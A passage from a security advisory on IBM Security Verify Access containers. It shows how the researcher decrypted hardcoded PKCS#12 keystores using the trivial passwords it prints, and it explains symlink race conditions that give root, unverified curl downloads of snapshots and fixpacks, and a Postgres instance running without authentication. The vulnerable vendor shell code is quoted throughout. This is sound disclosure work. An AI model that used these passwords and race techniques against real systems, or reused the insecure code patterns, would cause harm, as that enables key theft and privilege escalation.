[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/admin.pwd
[REDACTED]

[root@container-01]# podman exec -it 413823e2f7d1 ls -la /etc/wga_notifications.conf
-rw-rw-r-- 1 root root 883 Sep 26 15:40 /etc/wga_notifications.conf
[root@container-01]# podman exec -it 413823e2f7d1 cat /etc/wga_notifications.conf
[...]
sam_cluster.hvdb.driver_type = thin
isam_cluster.hvdb.embedded = false
isam_cluster.hvdb.port = 1536
isam_cluster.hvdb.pwd = [REDACTED]
isam_cluster.hvdb.secure = false
[...]

A local attacker can extract hashes from world-readable files and elevate its privileges.

The use of /etc/shadow.isam is unknown.

Details - Hardcoded PKCS#12 files

It was observed the Docker image verify-access contains hardcoded PKCS#12 files:

    • /var/isam/cluster/sundry/odbc/ewallet.p12
    • /var/pdweb/shared/keytab/lmi_trust_store.p12
    • /var/pdweb/shared/keytab/embedded_ldap_keys.p12
    • /var/pdweb/shared/keytab/rt_profile_keys.p12

The /var/isam/cluster/sundry/odbc/ewallet.p12 file can be found inside the verify-access image:

kali-docker# ls -la ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
-rw-r--r-- 1 5000 5000 736 Jun  8 01:32 ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12

kali-docker# sha256sum ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12
687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  ./_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12

When checking on the live system (verify-access), we can find this unchanged file:

[root@container-01]# podman ps | grep 413823e2f7d1
413823e2f7d1  ibmcom/verify-access/10.0.4.0:20220926.6                         26 hours ago  Up 26 hours ago (healthy)  0.0.0.0:7443->9443/tcp            verify-access
[root@container-01]# podman exec -it 413823e2f7d1 ls -la /var/isam/cluster/sundry/odbc/
total 16
drwxr-xr-x 2 www-data www-data 4096 Jun  8 13:43 . 
drwxr-xr-x 3 cluster  cluster  4096 Jun  8 13:43 .. 
-rw-r--r-- 1 www-data www-data  781 Jun  8 13:32 cwallet.sso
-rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 cwallet.sso.lck
-rw-r--r-- 1 www-data www-data  736 Jun  8 13:32 ewallet.p12
-rw-r--r-- 1 www-data www-data    0 Jun  8 13:32 ewallet.p12.lck
[root@container-01]# podman exec -it 413823e2f7d1 sha256sum /var/isam/cluster/sundry/odbc/ewallet.p12
687614048adb7877b7405a1d7f50c3717d832e0f1c822793507b99666d13acd5  /var/isam/cluster/sundry/odbc/ewallet.p12
[root@container-01]#

This file is used by several programs, with a trivial password (passw0rd) to encrypt it:

Assembly code of the function authorSqlFuseFiles found inside mesa_config, used to extract ewallet.p12:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Extraction using OpenSSL:

kali-docker# openssl pkcs12 -in ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/isam/cluster/sundry/odbc/ewallet.p12 -out /tmp/ewallet.test        
Enter Import Password: [passw0rd]
kali-docker# cat /tmp/ewallet.test
Bag Attributes
    localKeyID: E6 B6 52 DD 00 00 00 04 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 04 
subject=C = us, O = ibm, CN = rhel66.home.com
issuer=C = us, O = ibm, CN = rhel66.home.com
-----BEGIN CERTIFICATE-----
MIIB2TCCAUICAQAwDQYJKoZIhvcNAQEEBQAwNTELMAkGA1UEBhMCdXMxDDAKBgNV
BAoTA2libTEYMBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMB4XDTE2MDYwNDE4MjAx
N1oXDTI2MDYwMjE4MjAxN1owNTELMAkGA1UEBhMCdXMxDDAKBgNVBAoTA2libTEY
MBYGA1UEAxMPcmhlbDY2LmhvbWUuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQC5awQOrQ/BlLYQ1dC0+e2NplzULT447UNrj8yaPqH0FeoqgLH29FzpVJV1
IWzN06IGSUEeyAck7u7EUg1BK3eyfwO3o1qolrvRkm4Rsvg+yijUIr2aSV0Xz9oR
71C+YMHr1MtGi6Xn432+vPSc2AxQVBKCVj0rBGka6V9mwWDPewIDAQABMA0GCSqG
SIb3DQEBBAUAA4GBAF9QlpGUC9QcxgI0B77xY0/2bNd3xBfS+hTbgyyoWRzH43so
1VG97F6g0rR6wvsAOTdr7kJn+t7sMyuhdJ2/TmZFATUL+6j9XpJH+7r+Ca4iIMB+
ysi09PVz6ccrsgpD9SiYxQ4HMJ+YKBahPg3geEUIkratxB69qZy0uP5WSp64
-----END CERTIFICATE-----
kali-docker# openssl x509 -in /tmp/ewallet.test -text -noout                                                                                                                              
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 0 (0x0)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C = us, O = ibm, CN = rhel66.home.com
        Validity
            Not Before: Jun  4 18:20:17 2016 GMT
            Not After : Jun  2 18:20:17 2026 GMT
        Subject: C = us, O = ibm, CN = rhel66.home.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:b9:6b:04:0e:ad:0f:c1:94:b6:10:d5:d0:b4:f9:
                    ed:8d:a6:5c:d4:2d:3e:38:ed:43:6b:8f:cc:9a:3e:
                    a1:f4:15:ea:2a:80:b1:f6:f4:5c:e9:54:95:75:21:
                    6c:cd:d3:a2:06:49:41:1e:c8:07:24:ee:ee:c4:52:
                    0d:41:2b:77:b2:7f:03:b7:a3:5a:a8:96:bb:d1:92:
                    6e:11:b2:f8:3e:ca:28:d4:22:bd:9a:49:5d:17:cf:
                    da:11:ef:50:be:60:c1:eb:d4:cb:46:8b:a5:e7:e3:
                    7d:be:bc:f4:9c:d8:0c:50:54:12:82:56:3d:2b:04:
                    69:1a:e9:5f:66:c1:60:cf:7b
                Exponent: 65537 (0x10001)
    Signature Algorithm: md5WithRSAEncryption
    Signature Value:
        5f:50:96:91:94:0b:d4:1c:c6:02:34:07:be:f1:63:4f:f6:6c:
        d7:77:c4:17:d2:fa:14:db:83:2c:a8:59:1c:c7:e3:7b:28:d5:
        51:bd:ec:5e:a0:d2:b4:7a:c2:fb:00:39:37:6b:ee:42:67:fa:
        de:ec:33:2b:a1:74:9d:bf:4e:66:45:01:35:0b:fb:a8:fd:5e:
        92:47:fb:ba:fe:09:ae:22:20:c0:7e:ca:c8:b4:f4:f5:73:e9:
        c7:2b:b2:0a:43:f5:28:98:c5:0e:07:30:9f:98:28:16:a1:3e:
        0d:e0:78:45:08:92:b6:ad:c4:1e:bd:a9:9c:b4:b8:fe:56:4a:
        9e:b8

The other files have been decrypted using IBM Crypto For C and OpenSSL.

The lmi_trust_store.p12 file in the verify-access image contains several CAs and will also include the hardcoded key for the Isam CA in a live instance (after configuration):

kali-docker# file=ibmcom/_verify-access.tar/698cf9c0c7bb644159c92ba42d86417dd09694093db2eaf8875885e5ddd62fcc/var/pdweb/shared/keytab/lmi_trust_store.p12
kali-docker# LD_LIBRARY_PATH=/home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/lib64/ /home/user/ibmcom/_verify-access-dsc.tar/2367f4ea9084713497b97a1fdbd68e6b3845d86537a89f1d6217eb545e8a0865/usr/local/ibm/gsk8_64/bin/gsk8capicmd_64 -cert -export -db $file -stashed -target /tmp/tmp.p12 -target_pw passwordpassword

kali-docker# openssl pkcs12 -in /tmp/tmp.p12 -info -passin pass:passwordpassword
MAC: sha1, Iteration 1024
MAC length: 20, salt length: 8
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: CN=DigiCert Global Root CA,OU=www.digicert.com,O=DigiCert Inc,C=US
    localKeyID: 03 82 01 01 00 CB 9C 37 AA 48 13 12 0A FA DD 44 9C 4F 52 B0 F4 DF AE 04 F5 79 79 08 A3 24 18 FC 4B 2B 84 C0 2D B9 D5 C7 FE F4 C1 1F 58 CB B8 6D 9C 7A 74 E7 98 29 AB 11 B5 E3 70 A0 A1 CD 4C 88 99 93 8C 91 70 E2 AB 0F 1C BE 93 A9 FF 63 D5 E4 07 60 D3 A3 BF 9D 5B 09 F1 D5 8E E3 53 F4 8E 63 FA 3F A7 DB B4 66 DF 62 66 D6 D1 6E 41 8D F2 2D B5 EA 77 4A 9F 9D 58 E2 2B 59 C0 40 23 ED 2D 28 82 45 3E 79 54 92 26 98 E0 80 48 A8 37 EF F0 D6 79 60 16 DE AC E8 0E CD 6E AC 44 17 38 2F 49 DA E1 45 3E 2A B9 36 53 CF 3A 50 06 F7 2E E8 C4 57 49 6C 61 21 18 D5 04 AD 78 3C 2C 3A 80 6B A7 EB AF 15 14 E9 D8 89 C1 B9 38 6C E2 91 6C 8A FF 64 B9 77 25 57 30 C0 1B 24 A3 E1 DC E9 DF 47 7C B5 B4 24 08 05 30 EC 2D BD 0B BF 45 BF 50 B9 A9 F3 EB 98 01 12 AD C8 88 C6 98 34 5F 8D 0A 3C C6 E9 D5 95 95 6D DE 
    2.16.840.1.113894.746875.1.1: <Unsupported tag 6>
subject=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
issuer=C = US, O = DigiCert Inc, OU = www.digicert.com, CN = DigiCert Global Root CA
-----BEGIN CERTIFICATE-----
MIIDrzCCApegAwIBAgIQCDvgVpBCRrGhdWrJWZHHSjANBgkqhkiG9w0BAQUFADBh
MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
d3cuZGlnaWNlcnQuY29tMSAwHgYDVQQDExdEaWdpQ2VydCBHbG9iYWwgUm9vdCBD
QTAeFw0wNjExMTAwMDAwMDBaFw0zMTExMTAwMDAwMDBaMGExCzAJBgNVBAYTAlVT
MRUwEwYDVQQKEwxEaWdpQ2VydCBJbmMxGTAXBgNVBAsTEHd3dy5kaWdpY2VydC5j
b20xIDAeBgNVBAMTF0RpZ2lDZXJ0IEdsb2JhbCBSb290IENBMIIBIjANBgkqhkiG
9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4jvhEXLeqKTTo1eqUKKPC3eQyaKl7hLOllsB
CSDMAZOnTjC3U/dDxGkAV53ijSLdhwZAAIEJzs4bg7/fzTtxRuLWZscFs3YnFo97
nh6Vfe63SKMI2tavegw5BmV/Sl0fvBf4q77uKNd0f3p4mVmFaG5cIzJLv07A6Fpt
43C/dxC//AH2hdmoRBBYMql1GNXRor5H4idq9Joz+EkIYIvUX7Q6hL+hqkpMfT7P
T19sdl6gSzeRntwi5m3OFBqOasv+zbMUZBfHWymeMr/y7vrTC0LUq7dBMtoM1O/4
gdW7jVg/tRvoSSiicNoxBN33shbyTApOB6jtSj1etX+jkMOvJwIDAQABo2MwYTAO
BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUA95QNVbR
TLtm8KPiGxvDl7I90VUwHwYDVR0jBBgwFoAUA95QNVbRTLtm8KPiGxvDl7I90VUw
DQYJKoZIhvcNAQEFBQADggEBAMucN6pIExIK+t1EnE9SsPTfrgT1eXkIoyQY/Esr
hMAtudXH/vTBH1jLuG2cenTnmCmrEbXjcKChzUyImZOMkXDiqw8cvpOp/2PV5Adg
06O/nVsJ8dWO41P0jmP6P6fbtGbfYmbW0W5BjfIttep3Sp+dWOIrWcBAI+0tKIJF
PnlUkiaY4IBIqDfv8NZ5YBberOgOzW6sRBc4L0na4UU+Krk2U886UAb3LujEV0ls
YSEY1QSteDwsOoBrp+uvFRTp2InBuThs4pFsiv9kuXclVzDAGySj4dzp30d8tbQk
CAUw7C29C79Fv1C5qfPrmAESrciIxpg0X40KPMbp1ZWVbd4=
-----END CERTIFICATE-----
Certificate bag
Bag Attributes
    friendlyName: CN=DigiCert ECC Secure Server CA,O=DigiCert Inc,C=US
[...]

When auditing live installations, the decrypted lmi_trust_store.p12 file will contain the private key of the isam CA. 

kali% openssl x509 -in crt.pem -text -noout -modulus
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 14004578023842938
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C = us, O = ibm, CN = isam
        Validity
            Not Before: Sep 19 07:01:51 2022 GMT
            Not After : Sep 17 07:01:51 2032 GMT
        Subject: C = us, O = ibm, CN = isam
[...]
Modulus=C8B3[REDACTED]

kali% openssl rsa -in crt.key -modulus               
Enter pass phrase for crt.key:
Modulus=C8B3[REDACTED]
writing RSA key
-----BEGIN PRIVATE KEY-----
[REDACTED]
-----END PRIVATE KEY-----

It is also possible to decrypt the embedded_ldap_keys.p12 file:

kali-docker# openssl pkcs12 -in embedded_ldap_keys.p12 -info -passin pass:passwordpassword 
MAC: sha1, Iteration 1024       
MAC length: 20, salt length: 8
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 5
Bag Attributes
    friendlyName: server
    localKeyID: [REDACTED]
Key Attributes: <No Attributes>
Enter PEM pass phrase: [password]
Verifying - Enter PEM pass phrase: [password]
-----BEGIN ENCRYPTED PRIVATE KEY-----
[REDACTED]
-----END ENCRYPTED PRIVATE KEY-----
PKCS7 Encrypted data: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 1024
Certificate bag
Bag Attributes
    friendlyName: server
    localKeyID: [REDACTED]
subject=C = us, O = ibm, CN = isam
issuer=C = us, O = ibm, CN = isam
-----BEGIN CERTIFICATE-----
[REDACTED]
-----END CERTIFICATE-----
kali-docker#

Using a dynamic analysis, it was confirmed that several private keys are included in the snapshot images and used at least by OpenLDAP. The .p12 files can be decrypted using IBM Crypto For C and OpenSSL. 

kali-docker# pwd                                            
/home/user/snapshots/_a22547c15c88-verify-access-runtime_10.0.4.0.tar-default.snapshot/var/pdweb/shared/keytab
kali-docker# ls -la
total 492
drwxr-x---  2 root root   4096 Oct 18 05:13 . 
drwxr-x--- 16 root root   4096 Sep 20 03:01 .. 
-rw-r-----  1 root root   2952 Sep 20 03:01 embedded_ldap_keys.p12
-rw-r-----  1 root root    193 Jun  8 01:31 embedded_ldap_keys.sth
-rw-r-----  1 root root  47630 Sep 20 03:09 lmi_trust_store.p12
-rw-r-----  1 root root    193 Jun  8 01:31 lmi_trust_store.sth
-rw-r-----  1 root root 109313 Sep 20 03:17 rt_profile_keys.p12
-rw-r-----  1 root root    193 Jun  8 01:31 rt_profile_keys.sth
[...]

Details - Incorrect permissions in verify-access-dsc (race condition and leak of private key)

It was observed that the Docker image verify-access-dsc uses insecure temporary files to store sensitive information.

The /usr/sbin/bootstrap.sh script will generate temporary files using the default umask (022).

In the build_health_check_config() function found inside the /usr/sbin/bootstrap.sh script (executed when the instance starts), we can see that several files are generated:

    • /tmp/health_check.p12
    • /var/dsc/.health/port.txt

Content of /usr/sbin/bootstrap.sh:

[code:shell] 65 ############################################################################# 66 # Construct the health check configuration information. This will include 67 # the port and client certificate information. 68 69 build_health_check_config() 70 { 71 if [ -z "$INSTANCE" ] ; then 72 INSTANCE=1 73 fi 74 75 conf=/var/dsc/etc/dsc.conf.${INSTANCE} 76 77 if [ ! -f ${conf} ] ; then 78 Echo 973 "${INSTANCE}" 79 exit 1 80 fi 81 82 # 83 # Determine the port which is to be used. 84 # 85 86 port=/opt/PolicyDirector/sbin/pdconf -f $conf getentry \ 87 dsess-server ssl-listen-port 88 89 mkdir -p /var/dsc/.health 90 91 echo $port > /var/dsc/.health/port.txt 92 93 # 94 # Extract the client certificate which is used to communicate with the 95 # server. 96 # 97 98 cert_file=/var/dsc/.health/health_check.pem 99 100 tmp_p12=/tmp/health_check.p12 101 tmp_pwd=health_check 102 103 # Work out the name of the key file which is being used. 104 key_file=/opt/PolicyDirector/sbin/pdconf -f $conf getentry \ 105 dsess-server ssl-keyfile 106 107 # Export the key into a key database type which is supported 108 # by OpenSSL. 109 gsk8capicmd_64 -cert -export -db $key_file -stashed \ 110 -target $tmp_p12 -target_pw $tmp_pwd 111 112 # Convert the key into something that curl understands. 113 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \ 114 -passin pass:$tmp_pwd 2>/dev/null 115 116 # Tidy up. 117 rm -f $tmp_p12 118 } 119 [...] 176 # 177 # Extract the health check information. 178 # 179 180 build_health_check_config [/code]

The temporary file /tmp/health_check.p12 contains the private keys of the dsc server and the dsc client. This key file is stored using the 644 permissions allowing any local attacker to extract these keys when the Docker image starts.

Furthermore, the password of the certificate file is hardcoded (to health_check, on line 101).

When checking the files generated by this script, we can confirm the files are world-readable. For example, for the /var/dsc/.health/port.txt file, the permissions are 644:

[isam@verify-access-dsc /]$ ls -la /var/dsc/.health/
total 28
drwxr-xr-x 2 isam isam 4096 Oct  4 09:07 . 
drwxrwx--- 1 isam root 4096 Oct  4 09:07 ..     
-rw------- 1 isam isam 9268 Oct  4 09:07 health_check.pem
-rw-r--r-- 1 isam isam    5 Oct  4 09:07 port.txt
[isam@verify-access-dsc /]$

There is a race condition in the /usr/sbin/bootstrap.sh script allowing a local attacker with access to the verify-access-dsc instance to extract the private keys of the dsc server and the dsc client when the Docker image starts.

The filename is predictable, allowing a local attacker to create the destination file before the script is executed. The content of the destination file will be overwritten by the /usr/sbin/health_check.sh script but the ownership of the file will still belong to an attacker, allowing extracting the private keys.

The password is hardcoded.

Insecure permissions are used for sensitive files.

Details - Insecure health_check.sh script in verify-access (race condition and leak of private key)

It was observed that the Docker image verify-access runs regularly the script /usr/sbin/health_check.sh.

This script uses a temporary file to store sensitive information. Since this script uses the default umask (022), an attacker can exploit a race condition (between the lines 91 and 95) to extract the private keys of the dsc server and the dsc clients.

The /tmp/health_check.pem output file will also be created containing the private keys in clear-text (in line 91), allowing an attacker to extract these private keys:

Content of /usr/sbin/health_check.sh:

[code:shell] [...] 65 cert_file=/tmp/health_check.pem 66 67 trap "rm -f $result_file $error_file $hdr_file" EXIT 68 69 # The following function will extract a key which can be used to authenticate 70 # to the DSC. 71 72 extract_dsc_key() 73 { 74 if [ ! -f $cert_file ] ; then 75 tmp_p12=/tmp/health_check.p12.$$ 76 tmp_pwd=health_check 77 78 # Work out the name of the DSC configuration file. 79 conf_file=mesa_config wga.ftype dir dsc.conf -production 80 81 # Work out the name of the key file which is being used. 82 key_file=/opt/PolicyDirector/sbin/pdconf -f $conf_file getentry \ 83 dsess-server ssl-keyfile 84 85 # Export the key into a key database type which is supported 86 # by OpenSSL. 87 gsk8capicmd_64 -cert -export -db $key_file -stashed \ 88 -target $tmp_p12 -target_pw $tmp_pwd 89 90 # Convert the key into something that curl understands. 91 openssl pkcs12 -in $tmp_p12 -out $cert_file -nodes \ 92 -passin pass:$tmp_pwd 2>/dev/null 93 94 # Tidy up. 95 rm -f $tmp_p12 96 fi 97 } [...] [/code]

The file /tmp/health_check.p12.$$ ($$ corresponding to the local PID) will be generated with the password health_check and will contain the private keys of the dsc client and the dsc server. This file will be world-readable. Then the file will be erased.

There is a race condition in the /usr/sbin/health_check.sh script allowing a local attacker with access to the verify-access instance to extract the private keys of the dsc server and the dsc client.

The filename is predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination file will be overwritten by the /usr/sbin/health_check.sh script but the ownership of the file will still belong to an attacker, allowing extracting the private keys.

There is also a leak of private keys in the world-readable file /tmp/health_check.pem.

The password is hardcoded.

Insecure permissions are used for sensitive files.

Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)

It was observed that the Docker image verify-access regularly runs the script /usr/sbin/health_check.sh.

This script uses curl, without checking the remote SSL certificate:

Content of /usr/sbin/health_check.sh:

[code:shell] 190 # 191 # Make the curl request. 192 # 193 194 eval curl --insecure --output $result_file --silent --show-error \ 195 -D $hdr_file $extra_args https://127.0.0.1:$port 2> $error_file 196 [/code]

The eval instruction does not seem exploitable.

This script uses 2 temporary files to store the standard output (stdout) and the error output (stderr) of the curl command: an attacker can exploit these 2 temporary files to overwrite any file in the filesystem using pre-generated symbolic links inside /tmp:

Content of /usr/sbin/health_check.sh:

[code:shell] 62 result_file=/tmp/health_check.out.$$ 63 error_file=/tmp/health_check.err.$$ [...] 194 eval curl --insecure --output $result_file --silent --show-error \ 195 -D $hdr_file $extra_args https://127.0.0.1:$port 2> $error_file [/code]

The /tmp/health_check.out.$$ file ($$ corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root.

The /tmp/health_check.err.$$ file ($$ corresponding to the local PID) can be a symbolic link generated by a local attacker - the content of the linked file will be overwritten as root.

The script trusts any insecure HTTPS server, due to the use of the --insecure flag in curl.

There are two uses of insecure files in the /usr/sbin/health_check.sh script allowing a local attacker with access to the verify-access instance to overwrite any file as root - it is possible to get a Local Privilege Escalation as root.

The filenames are predictable, allowing a local attacker to create potential destination files before the execution of the script. The content of the destination files will be overwritten by the /usr/sbin/health_check.sh script.

Details - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)

It was observed that the Docker image verify-access-sc runs regularly the script /usr/sbin/health_check.sh.

This script uses a temporary file to store errors: an attacker can exploit a race condition to overwrite any file in the filesystem using a pre-generated symbolic link.

Furthermore, the script uses insecure options for curl on line 73 (--insecure) - the SSL certificate of the remote host will not be validated:

Content of /usr/sbin/health_check.sh:

[code:shell] 62 # 63 # Test access to the server as this will govern whether we are healthy or 64 # not. 65 # 66 67 error_file=/tmp/health_check.err.$$ 68 69 trap "rm -f $error_file" EXIT 70 71 ping_body='0' 72 73 curl -s -o /dev/null --show-error --insecure --cert $cert_file -X POST \ 74 -H 'SOAPAction: "ping"' \ 75 --data "$ping_body" \ 76 https://127.0.0.1:$port 2> $error_file 77 78 if [ $? -ne 0 ] ; then 79 # 80 # We don't know for sure yet whether the DSC is alive or not because it 81 # could be passive (only a single DSC is active in an environment at any 82 # one time). So, we also need to try a simple SSL connection before we 83 # return that the server is actually unhealthy. We could have simply 84 # avoided the initial curl call, but by only performing the SSL connection 85 # test when the DSC is passive we avoid SSL error messages being displayed 86 # on the console. 87 # 88 89 openssl s_client -connect 127.0.0.1:$port 2>&1 | grep -q CONNECTED 90 91 if [ $? -eq 0 ] ; then 92 exit 0 93 fi 94 95 echo "Error> failed to connect to the service." 96 97 cat $error_file; rm -f $cert_file [/code]

The /tmp/health_check.err.$$ file ($$ corresponding to the local PID) can be a symbolic link that will be followed in the line 76. This allows an attacker to overwrite any file on the system because curl is executed as root.

There is a race condition in the /usr/sbin/health_check.sh script allowing a local attacker to overwrite any file as root on the instance - it is possible to get a Local Privilege Escalation as root.

The filename is predictable, allowing a local attacker to create potential destination files. The content of the destination file will be overwritten by the stderr file descriptor of the curl command.

Details - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp

It was observed that the Docker images verify-access-dsc ,verify-access-runtime and verify-access-wrp are able to download the snapshot file over HTTPS without checking the SSL certificate of the remote server, allowing an attacker to MITM the connection and retrieve the snapshot file or to provide a malicious snapshot file to the system.

The /usr/sbin/.bootstrap_common.sh script is executed from the /usr/sbin/bootstrap.sh script when the instance starts:

Content of /usr/sbin/bootstrap.sh in verify-access-dsc

[code:shell] 139 # 140 # Wait for the snapshot file. 141 # 142 143 wait_for_snapshot [/code]

In verify-access-runtime, the function wait_for_snapshot() is called on line 93 inside the /usr/sbin/bootstrap.sh script.

The function wait_for_snapshot() calls the function download_from_cfgsvc() (line 251):

Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 240 ############################################################################# 241 # Wait for the snapshot file. 242 243 wait_for_snapshot() 244 { 245 download_from_cfgsvc 1 246 247 if [ ! -f $snapshot ] ; then 248 Echo 969 249 250 while [ ! -f $snapshot ] ; do 251 download_from_cfgsvc 0 252 253 if [ ! -f $snapshot ] ; then 254 sleep 1 255 fi 256 done 257 258 Echo 970 259 fi 260 } [/code]

And the function download_from_cfgsvc() uses curl to download a snapshot, without checking the SSL certificate of the remote server. The -k option (also known as --insecure) disables any SSL verification (line 154):

Content /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 140 download_from_cfgsvc() 141 { 142 # No need to download the snapshot if the configuration service has not 143 # been defined. 144 if [ -z "$CONFIG_SERVICE_URL" ] ; then 145 return 146 fi 147 148 if [ $1 -eq 1 ] ; then 149 Echo 960 150 fi 151 152 snapshotUri="basename $snapshot?type=File&client=cat /etc/hostname" 153 154 curl -k -s --fail -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 155 "$CONFIG_SERVICE_URL/snapshots/$snapshotUri" \ 156 -o $snapshot 157 158 if [ $? -ne 0 ] ; then 159 if [ $1 -eq 1 ] ; then 160 Echo 961 161 fi 162 163 rm -f $snapshot 164 else 165 Echo 962 166 fi 167 } [/code]

  • From the curl(1) man page:
       -k, --insecure
          (TLS) By default, every SSL connection curl makes is verified to
          be secure. This option allows curl to proceed and operate even
          for server connections otherwise considered insecure.

          The server connection is verified by making sure the server's
          certificate contains the right name and verifies successfully
          using the cert store.

          See this online resource for further details:
           https://curl.haxx.se/docs/sslcerts.html

          See also --proxy-insecure and --cacert.

The same issue exists with the function download_fixpacks() in the same shell script (line 201):

Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 169 ############################################################################# 170 # Attempt to download any requested fixpacks from the configuration service. 171 172 download_fixpacks() 173 { 174 # No need to download the fixpacks if the configuration service has not 175 # been defined. 176 if [ -z "$CONFIG_SERVICE_URL" ] ; then 177 return 178 fi 179 180 # No need to download the fixpacks if no fixpack has been specified, or 181 # if the fixpack has been set to 'disabled'. 182 if [ -z "${FIXPACKS}" -o "${FIXPACKS}" = "disabled" ]; then 183 return 184 fi 185 186 # Set the fixpack directory, and then ensure that the fixpack directory 187 # has been created. 188 fixpack_dir=/tmp/fixpacks 189 190 if [ -d $fixpack_dir ] ; then 191 rm -rf $fixpack_dir/* 192 else 193 mkdir -p $fixpack_dir 194 fi 195 196 # If we get this far we know that one or more fixpacks have been specified. 197 # We need to download each of these now. 198 for fixpack in $FIXPACKS; do 199 fixpackUri="$fixpack?type=File&client=cat /etc/hostname" 200 201 curl -k -s --fail \ 202 -u "$CONFIG_SERVICE_USER_NAME:$CONFIG_SERVICE_USER_PWD" \ 203 "$CONFIG_SERVICE_URL/fixpacks/$fixpackUri" \ 204 -o $fixpack_dir/$fixpack [/code]

The fixpacks will be then installed as root inside the image:

Content of /usr/sbin/.bootstrap_common.sh in verify-access-dsc, verify-access-runtime and verify-access-wrp:

[code:shell] 231 for fixpack in $FIXPACKS; do 232 Echo 967 "${fixpack}" 233 /usr/sbin/isva_install_fixpack -i ${fixpack_dir}/${fixpack} >/dev/null 234 if [ $? -ne 0 ]; then 235 Echo 968 "${fixpack}" 236 fi [/code]

An attacker located on the network can inject a malicious snapshot file into the platform or MITM the connection to a server containing the snapshot image and take control over the entire platform.

Details - Lack of authentication in Postgres inside verify-access-runtime

It was observed that the Docker image verify-access-runtime configures Postgres without authentication.

The /usr/sbin/bootstrap.sh script configures and starts the postgres daemon. We can see the lack of authentication:

[code:shell] 135 # 136 # Start the postgresql server. 137 # 138 139 Echo 974 140 141 db_root=/var/postgresql/config 142 db_data_root=$db_root/data 143 db_snapshot=$db_root/snapshot.sql 144 db_log_dir=/var/application.logs/db/config 145 db_port=5432 146 db_name=config 147 db_user=www-data 148 149 if [ ! -f $db_snapshot ] ; then 150 Echo 975 151 exit 1 152 fi 153 154 mkdir -p $db_log_dir 155 156 rm -rf $db_data_root 157 158 initdb -D $db_data_root --locale=C -U $db_user -A trust > /dev/null 159 160 pg_ctl -s -D $db_data_root -l $db_log_dir/logfile start 161 162 createdb -U $db_user -p $db_port -w $db_name > /dev/null 163 164 psql -U $db_user -p $db_port -f $db_snapshot -w -q $db_name > /dev/null 165 [/code]

A local attacker can compromise the postgres database.

Details - Null pointer dereference in dscd - Remote DoS against DSC instances

It was observed that the DSC (Distributed Session Cache) servers can be remotely crashed, resulting in a DoS of the authentication infrastructure.

The DSC servers are reachable using the /DSess/services/DSess API running on port 8443/tcp.

Using an SSL client certificate, it is possible to reach the remote DSC instances from the same network segment:

[user@container-01 ~]$ curl -kv https://dsc-02.test.lan:8443
* Rebuilt URL to: https://dsc-02.test.lan:8443/
*   Trying 10.0.0.16... 
* TCP_NODELAY set
* Connected to dsc-02.test.lan (10.0.0.16) port 8443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*   CAfile: /etc/pki/tls/certs/ca-bundle.crt
  CApath: none
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Request CERT (13):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Certificate (11):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS alert, handshake failure (552):
